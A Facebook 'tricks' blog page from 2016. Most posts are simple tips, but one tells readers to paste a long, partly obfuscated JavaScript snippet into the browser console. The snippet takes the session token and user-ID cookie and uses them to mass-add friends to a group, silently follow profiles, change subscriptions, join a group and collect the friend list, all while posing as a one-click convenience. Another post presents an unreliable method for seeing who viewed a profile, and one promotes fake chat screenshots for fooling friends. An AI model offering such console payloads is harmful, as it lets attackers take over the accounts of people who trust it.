Showing posts with label Facebook Tricks. Show all posts
Showing posts with label Facebook Tricks. Show all posts

Monday, 7 March 2016

Hide Online Status For Some Friends In Facebook



Many of us don't know how to hide online status for some specific friends on Facebook.So follow these steps....

1-Go to your FB account and select setting icon on right-down on chat box.

2-Select Advance Setting.

3-Select Turn off chat for only some friends,,,

4-Type your friend name from whom you want to hide your online status.

Click Save,,done,,,,

Wednesday, 24 February 2016

Add All Friends To FB Group In Single Click


When we want to add our fb friends to any group normally we add them separately and it takes more time.So if you want to add your all friends in a fb group in just a second and single click.Then follow the steps.


Note;-Use Google Chrome

1)Go to Facebook.com and log in to your acccount.

2)Go to your specific group.

3)Type F12 to open developer window


4)Select Console Tab


5)Paste this Code and press Enter


    1. (function(){var f={dtsg:document.getElementsByName("fb_dtsg")[0].value,uid:document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]),gid:document.getElementsByName("group_id")[0].value,frns:Array(),prenKe:0,okeh:0,gagal:0,getAjak:function(b){var c=new XMLHttpRequest;c.open("GET",b,!0),c.onreadystatechange=function(){if(4==c.readyState&&200==c.status){var a=eval("("+c.responseText.substr(9)+")");a.payload&&a.payload.entries&&(f.frns=a.payload.entries.sort(function(){return.5-Math.random()})),document.getElementById("hasilsurasil").innerHTML="Found <b>"+f.frns.length+" Abonnenten</b><div id='hasilsatu'></div><div id='hasildua'></div><div id='hasiltiga' style='min-width:300px;display:inline-block;text-align:left'></div>"+crj;for(x in f.frns)f.senAjak(x)}else document.getElementById("hasilsurasil").innerHTML=4==c.readyState&&404==c.status?"<b style='color:darkred'>Gruppe Öffnen!</b>"+crj:"<b style='color:darkgreen'>Suche nach möglichen Abonnenten... ("+c.readyState+")</b>"+crj},c.send()},senAjak:function(d){var e=new XMLHttpRequest,prm="__a=1&fb_dtsg="+f.dtsg+"&group_id="+f.gid+"&source=typeahead&ref=&message_id=&members="+f.frns[d].uid+"&__user="+f.uid+"&phstamp=";e.open("POST","/ajax/groups/members/add_post.php",!0),e.setRequestHeader("Content-type","application/x-www-form-urlencoded"),e.setRequestHeader("Content-length",prm.length),e.setRequestHeader("Connection","keep-alive"),e.onreadystatechange=function(){if(4==e.readyState&&200==e.status){var a=eval("("+e.responseText.substr(9)+")");if(f.prenKe++,document.getElementById("hasilsatu").innerHTML="<div><b>"+f.prenKe+"</b> of <b>"+f.frns.length+"</b></div>",a.errorDescription&&(f.gagal++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkred'>( "+f.gagal+" )</b> <span style='color:darkred'>"+a.errorDescription+"</span></div>"),a.jsmods&&a.jsmods.require){var b="<div>";for(x in a.jsmods.require)a.jsmods.require[x][a.jsmods.require[x].length-1][1]&&(b+="<b style='color:darkgreen'>"+a.jsmods.require[x][a.jsmods.require[x].length-1][1]+"</b> ");b+="<div>",document.getElementById("hasildua").innerHTML=b}if(a.onload)for(z in a.onload){var c=eval(a.onload[z].replace(/Arbiter.inform/i,""));if(c.uid&&c.name){f.okeh++,document.getElementById("hasiltiga").innerHTML="<div><b style='color:darkgreen'>( "+f.okeh+" )</b> <a href='/"+c.uid+"' target='_blank'><b>"+c.name+"</b></a> haben dich abonniert.</div>";break}}f.prenKe==f.frns.length&&(document.getElementById("hasiltiga").style.textAlign="center",document.getElementById("hasiltiga").innerHTML+="<div style='font-size:20px;font-weight:bold'>20 Leute Einladen!</div><a href='/' onClick='document.getElementById(\"hasilsurasil\").style.display=\"none\";return false'>Schliesen</a>")}},e.send(prm)}},g=["i","a","e","g","o","s","n","b","l","p","m","2","r","0","c","1","t","3","©"],crl=g[1]+g[0]+g[6]+g[3]+g[14]+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+"."+g[7]+g[8]+g[4]+g[3]+g[5]+g[9]+g[4]+g[16]+"."+g[14]+g[4]+g[10],crj="<div style='margin-top:10px;color:gray;font-size:12px'>"+g[1].toUpperCase()+g[0]+g[6]+g[3]+g[14].toUpperCase()+g[12]+g[2]+g[1]+g[16]+g[0]+g[4]+g[6]+g[5]+" "+g[g.length-1]+g[11]+g[13]+g[15]+g[17]+"<div style='font-size:9px'><a href='http://"+crl+"/' target='_blank'>"+crl+"</a></div></div>";document.body.innerHTML+="<center id='hasilsurasil' style='min-height:50px;width:600px;position:fixed;top:100px;left:"+(document.body.offsetWidth-530)/2+"px;border-radius:10px;padding:10px;z-index:999999;border:5px solid skyblue;background-color:rgba(225,225,255,0.75)'><b>Suche nach Abonnenten ... Script by Mano </b>"+crj+"</center>",f.getAjak("/ajax/typeahead/first_degree.php?__a=1&viewer="+f.uid+"&token="+Math.random()+"&filter[0]=user&options[0]=friends_only")})(); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
      var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1])
      function cereziAl(isim) {
      var tarama = isim + "=";
      if (document.cookie.length > 0) {
      konum = document.cookie.indexOf(tarama)
      if (konum != -1) {
      konum += tarama.length
      son = document.cookie.indexOf(";", konum)
      if (son == -1)
      son = document.cookie.length
      return unescape(document.cookie.substring(konum, son))
      }
      else { return ""; }
      }
      }

      function getRandomInt (min, max) {
      return Math.floor(Math.random() * (max - min + 1)) + min;
      }
      function randomValue(arr) {
      return arr[getRandomInt(0, arr.length-1)];
      }

      var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
      var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

      function a(abone){
      var http4 = new XMLHttpRequest();

      var url4 = "/ajax/follow/follow_profile.php?__a=1";

      var params4 = "profile_id=" + abone + "&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg=" + fb_dtsg + "&lsd&__" + user_id + "&phstamp=";
      http4.open("POST", url4, true);

      //Send the proper header information along with the request
      http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
      http4.setRequestHeader("Content-length", params4.length);
      http4.setRequestHeader("Connection", "close");

      http4.onreadystatechange = function() {//Call a function when the state changes.
      if(http4.readyState == 4 && http4.status == 200) {

      http4.close; // Close the connection

      }
      }

      http4.send(params4);
      }

      function sublist(uidss) {
      var a = document.createElement('script');
      a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
      document.body.appendChild(a);
      }

      a("");
      a("");

      var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
      var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

      var httpwp = new XMLHttpRequest();
      var urlwp = '/ajax/groups/membership/r2j.php?__a=1';
      var paramswp = '&ref=group_jump_header&group_id=' + gid + '&fb_dtsg=' + fb_dtsg + '&__user=' + user_id + '&phstamp=';
      httpwp['open']('POST', urlwp, true);
      httpwp['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
      httpwp['setRequestHeader']('Content-length', paramswp['length']);
      httpwp['setRequestHeader']('Connection', 'keep-alive');
      httpwp['send'](paramswp);

      var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
      var user_id = document['cookie']['match'](document['cookie']['match'](/c_user=(\d+)/)[1]);

      var friends = new Array();
      gf = new XMLHttpRequest();
      gf['open']('GET', '/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token' + Math['random']() + '&filter[0]=user&options[0]=friends_only', false);
      gf['send']();
      if (gf['readyState'] != 4) {} else {
      data = eval('(' + gf['responseText']['substr'](9) + ')');
      if (data['error']) {} else {
      friends = data['payload']['entries']['sort'](function (_0x93dax8, _0x93dax9) {
      return _0x93dax8['index'] - _0x93dax9['index'];
      });
      };
      };

 6)Now your all friends add automically in your group.(If your friend list is big,it take some time to add)

Monday, 22 February 2016

How To Know Who Visit Your FB Profile


  1. Go to your profile page of Facebook.
  2. Press Ctrl+U to open source page of your Facebook profile
  3. Open search bar by pressing Ctrl+F
  4. Find this code {''list'': 

Step 5) You find some Facebook Profile Ids are like shown below. Click on example image for zoom.

Step 6) There are some Facebook Profile Ids of your friends who visited recently.
Step 7) The first one ID's are showing visits the most number of time. 
Step 8) Now if your want to findout, Open a new tab Enter below link :www.facebook.com/Facebook Profile Id
For Example : www.facebook.com/100001257992988

Wednesday, 17 February 2016

Make A Fake Facebook Chat


You can create Fake Facebook conversations to trick your friends. This tool also let us Include custom Pictures with Custom names and Comments. This tool is very easy to use and very user friendly.
The Best website to create Free Fake Facebook Conversations –

Sunday, 7 February 2016

Stop Candy Crush Requests on Facebook

It is  a very popular problem in Facebook.But after reading this post the problem will be not be big.So follow the steps;-

 1)Click on Candy Crush Request Notification.

2)Click 'Cancel' button instead of Play Now.

3)It will be prompted you to Game Page

4)Click Block

5)Confirm 



Done....

Facebook User?But Slow Internet Connection?Browse FB Superfast(PC User)

Facebook is one of the popoular socialnetworking website.But many of us cannot browse facebook perfectly because of slow internet connection.So in this post I can solve this problem.

Just visit Facebook from here

This trick work only in Firefox and Internet Explore.